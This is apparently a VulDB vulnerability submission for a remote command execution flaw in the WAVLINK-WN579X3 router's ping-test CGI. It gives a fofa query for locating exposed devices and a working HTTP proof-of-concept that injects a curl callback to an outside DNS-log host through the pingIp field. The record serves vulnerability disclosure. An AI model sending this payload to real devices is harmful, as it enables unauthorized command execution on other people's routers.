Title | WAVLINK-WN579X3 adm.cgi Remote Command Execution |
---|
Description | A remote command execution vulnerability has been found in WAVLINK-WN579X3. The vulnerable function is the Ping-Test function, an attacker can execute arbitrary system command by malicious injection to parameter pingIp.
fofa:app="WAVLINK-WN579X3"
POC:
---------------------------------------
POST /cgi-bin/adm.cgi HTTP/1.1
Host: ******
page=ping_test&CCMD=4&pingIp=255.255.255.255%3Bcurl+http%3A%2F%2Fnhjt4ugt.dnslog.pw
---------------------------------------
See details in https://github.com/sleepyvv/vul_report/blob/main/WAVLINK/WAVLINK-WN579X3-RCE.md |
---|
Source | ⚠️ https://github.com/sleepyvv/vul_report/blob/main/WAVLINK/WAVLINK-WN579X3-RCE.md |
---|
User | WWesleywww (ID 43117) |
---|
Submission | 2023-06-15 15時01分 (11 months ago) |
---|
Moderation | 2023-06-23 11時15分 (8 days later) |
---|
Status | 已接受 |
---|
VulDB Entry | 232236 |
---|